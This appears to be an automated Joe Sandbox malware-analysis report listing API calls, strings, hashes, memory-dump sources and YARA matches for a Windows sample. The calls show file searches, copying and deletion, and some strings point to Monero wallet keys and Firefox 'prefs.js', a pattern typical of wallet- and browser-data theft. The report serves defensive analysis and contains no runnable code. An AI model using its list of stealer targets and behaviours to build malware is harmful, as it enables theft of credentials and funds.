                                    • Opcode ID: 9ed6cfab4bf9afab1944ec20d1e735b43a99f7448adb504389572669ad6ddb70
                                    • Instruction ID: 199286c3bd0ceb7579f460eea39b1f02b1157a340f8bfccc90bce8309aee44c6
                                    • Opcode Fuzzy Hash: 9ed6cfab4bf9afab1944ec20d1e735b43a99f7448adb504389572669ad6ddb70
                                    • Instruction Fuzzy Hash: 9E5153B6900218ABCB24EBF0DC85EEA77BCBF48700F00459CB65996044DB75EB89DF51
                                    APIs
                                    • wsprintfA.USER32 ref: 00FAED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FAED55
                                    • StrCmpCA.SHLWAPI(?,00FC1538), ref: 00FAEDAB
                                    • StrCmpCA.SHLWAPI(?,00FC153C), ref: 00FAEDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAF2AE
                                    • FindClose.KERNEL32(000000FF), ref: 00FAF2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 8cadf177a2e81e0488ee42bb905c7d2c6bc2d014f188b96cff09cbe27becaea7
                                    • Instruction ID: 9ca700953923e8829f0f303194d6bb424edc646dadc8dcc1c82ff919646081d2
                                    • Opcode Fuzzy Hash: 8cadf177a2e81e0488ee42bb905c7d2c6bc2d014f188b96cff09cbe27becaea7
                                    • Instruction Fuzzy Hash: FBE12971911118AAEB64FB61DC52EEE737CAF54300F4041E9B40B62492EF34AF9AEF51
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FC15B8,00FC0D96), ref: 00FAF71E
                                    • StrCmpCA.SHLWAPI(?,00FC15BC), ref: 00FAF76F
                                    • StrCmpCA.SHLWAPI(?,00FC15C0), ref: 00FAF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00FAFAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 7d099760f027b661fdbd033229427076eb4709d062d8d5eff87627f26fa7c152
                                    • Instruction ID: 04be0f1be410a6fb247e9008321b7b5da176fd5663be0c128986e210a448186f
                                    • Opcode Fuzzy Hash: 7d099760f027b661fdbd033229427076eb4709d062d8d5eff87627f26fa7c152
                                    • Instruction Fuzzy Hash: 22B16B71900108ABDB24FF61DC96FED7379AF55300F5085A8E40A9B181EF349B49EF92
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FC510C,?,?,?,00FC51B4,?,?,00000000,?,00000000), ref: 00FA1923
                                    • StrCmpCA.SHLWAPI(?,00FC525C), ref: 00FA1973
                                    • StrCmpCA.SHLWAPI(?,00FC5304), ref: 00FA1989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FA1D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FA1DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FA1E20
                                    • FindClose.KERNEL32(000000FF), ref: 00FA1E32
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 039b1dbd0a10341615f76aa08b48814cdfafbdad4ea86427f733e59b18253dff
                                    • Instruction ID: 85aa882e2c0df15d1a6b57a09792a9e975f5bd76a56c54788d568c3441710858
                                    • Opcode Fuzzy Hash: 039b1dbd0a10341615f76aa08b48814cdfafbdad4ea86427f733e59b18253dff
                                    • Instruction Fuzzy Hash: 52121771910118BBDB25FB61DCA6EEE737CAF54300F404199B10666091EF38AF89EF91
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00FC0C2E), ref: 00FADE5E
                                    • StrCmpCA.SHLWAPI(?,00FC14C8), ref: 00FADEAE
                                    • StrCmpCA.SHLWAPI(?,00FC14CC), ref: 00FADEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAE3E0
                                    • FindClose.KERNEL32(000000FF), ref: 00FAE3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 17cf6ff71151e919e80bc7134d633107d6fce47ec9622f4294bf03645823c6ed
                                    • Instruction ID: 3ad890fe60311bc6594d85f12315a408fd14bf8834eaee2b5e58d1d049561dca
                                    • Opcode Fuzzy Hash: 17cf6ff71151e919e80bc7134d633107d6fce47ec9622f4294bf03645823c6ed
                                    • Instruction Fuzzy Hash: 5CF1E671814118AADB29FB61DCA6EEE7378BF15300F8041D9B01B62491EF346F9AEF51
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FC14B0,00FC0C2A), ref: 00FADAEB
                                    • StrCmpCA.SHLWAPI(?,00FC14B4), ref: 00FADB33
                                    • StrCmpCA.SHLWAPI(?,00FC14B8), ref: 00FADB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FADDCC
                                    • FindClose.KERNEL32(000000FF), ref: 00FADDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 94432bee01ae5c55d6e0a666200b9444cf969dd991d41e84dcf579f5c7e929d1
                                    • Instruction ID: 795a4de18ecb5a4f2eca73299f137777efbdbf33017377e08da64e8fdffd8d37
                                    • Opcode Fuzzy Hash: 94432bee01ae5c55d6e0a666200b9444cf969dd991d41e84dcf579f5c7e929d1
                                    • Instruction Fuzzy Hash: 0F9145B6900104ABCB14FBB1EC56DED737CAF85300F408568F81A96585EF38DB59AF92
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00FC05AF), ref: 00FB7BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FB7BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FB7C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FB7C62
                                    • LocalFree.KERNEL32(00000000), ref: 00FB7D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 58ffda9cda34835d85c16236fc58012a7a146414b8489d01f894e9fa4b6d8643
                                    • Instruction ID: d4bd5602945e60f5f26e6a0dbf67f33f426dd3c728394c79bb269b905516bab9
                                    • Opcode Fuzzy Hash: 58ffda9cda34835d85c16236fc58012a7a146414b8489d01f894e9fa4b6d8643
                                    • Instruction Fuzzy Hash: 25414E71940218ABDB24EB95DC99FEEB7B8FF48700F2041D9E00966181DB386F85DFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3W,1$Ao?=$Zy$fVO$t'o$t_}|$wMy
                                    • API String ID: 0-2597736597
                                    • Opcode ID: 7ffd7e6afa5487430b2f2155ab6f33f6cc1c63bbbf0e7070b899c26c0ddd00d5
                                    • Instruction ID: 33c26d595322a94c24e1db8b1d2f21e7b35eb87baed2d0baff41a2ea2e830358
                                    • Opcode Fuzzy Hash: 7ffd7e6afa5487430b2f2155ab6f33f6cc1c63bbbf0e7070b899c26c0ddd00d5
                                    • Instruction Fuzzy Hash: 9BB24BF3A0C2049FE3086E2DEC8567ABBD5EF94720F1A863DEAC5C3744E93558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2p}{$Ey;~$VG~u$b*~^$v=z'$|;8'$}=5-
                                    • API String ID: 0-1889371713
                                    • Opcode ID: 4bebcf5dadbcabcb26c699edb3b3cb31a62fcd40ac284eff8d7e2dbf724e5d02
                                    • Instruction ID: 0a766712b60fc4e70884d4759ef6361abefd05d78bc9674aaca82246fedcfd6b
                                    • Opcode Fuzzy Hash: 4bebcf5dadbcabcb26c699edb3b3cb31a62fcd40ac284eff8d7e2dbf724e5d02
                                    • Instruction Fuzzy Hash: 50B2E6F3A086009FE3046F2DEC8566AFBE9EF94720F1A492DEAC4D3744E63558058797
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00FC0D73), ref: 00FAE4A2
                                    • StrCmpCA.SHLWAPI(?,00FC14F8), ref: 00FAE4F2
                                    • StrCmpCA.SHLWAPI(?,00FC14FC), ref: 00FAE508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAEBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 133947dfba822589dd06cf8bbe345b3142c6bf0b59591b74ff11cf6532233d24
                                    • Instruction ID: 34c481134777012a8015c91a4e12e0d56b3f3d6f17bac8079a423b6cd082718d
                                    • Opcode Fuzzy Hash: 133947dfba822589dd06cf8bbe345b3142c6bf0b59591b74ff11cf6532233d24
                                    • Instruction Fuzzy Hash: 13126871910118BBDB24FB71DDA6EED7378AF54300F4045A8B50A96091EF38AF49EF92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,;LG$4vVm$_um$c-7$x__"$~3}_
                                    • API String ID: 0-3965853264
                                    • Opcode ID: 7c3e5e2f2b651a3865d96533d1522b1e032e33b1cd397e825b0c85a6619286db
                                    • Instruction ID: 32900f815220b75059c51e154914290a42d8060d763cf31f2f0a99b0d82c5066
                                    • Opcode Fuzzy Hash: 7c3e5e2f2b651a3865d96533d1522b1e032e33b1cd397e825b0c85a6619286db
                                    • Instruction Fuzzy Hash: D1B22CF3A0C204AFE3046E2DEC8567ABBD9EF94720F1A453DEAC5C3744EA3558058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'Xu$9@z#$Xv/=$aN|Y$fP|$~oq~
                                    • API String ID: 0-1385337697
                                    • Opcode ID: 348f9a77b03f76ea02e86d49561483dc26342a59fbf6c8890d9d299973251b34
                                    • Instruction ID: 372c6ce43f5f1afeaa2264d89a0d4cb0bb953587a41034dede4e9cabb50072ac
                                    • Opcode Fuzzy Hash: 348f9a77b03f76ea02e86d49561483dc26342a59fbf6c8890d9d299973251b34
                                    • Instruction Fuzzy Hash: 02B22BF3A082049FE304AE2DEC8567ABBD9EFD4720F1A853DEAC4C3744E93559058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /Jo|$>,A?$?#[t$l/y?$lI=$vE_
                                    • API String ID: 0-519695593
                                    • Opcode ID: 25aa053c7035132c157726be2f05c8397f38b206efeb08e6183c1ca938723619
                                    • Instruction ID: 438837dd9d4e05c665245c589b2567988dbbd99fb58cb27e6d1b505704dc780e
                                    • Opcode Fuzzy Hash: 25aa053c7035132c157726be2f05c8397f38b206efeb08e6183c1ca938723619
                                    • Instruction Fuzzy Hash: 73B2F5F3A0C214AFE3046F29EC8567AFBE9EF94720F1A492DE6C587340E63558418797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (>w$9/;$Cz7>$Q<L $grw]$gr~]
                                    • API String ID: 0-3341737076
                                    • Opcode ID: d3eccd56a21bd5e1299b25d85ed95e19a4aba32e7f8bb63ab86158c341720700
                                    • Instruction ID: d1f2454a986c060338e24d580167770e8d6a807ace9048729e70bf6b019ec362
                                    • Opcode Fuzzy Hash: d3eccd56a21bd5e1299b25d85ed95e19a4aba32e7f8bb63ab86158c341720700
                                    • Instruction Fuzzy Hash: 4F7216F3608200AFE7046E2DEC8577ABBE5EF94720F1A493DEAC4C7744E63598118697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                     • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
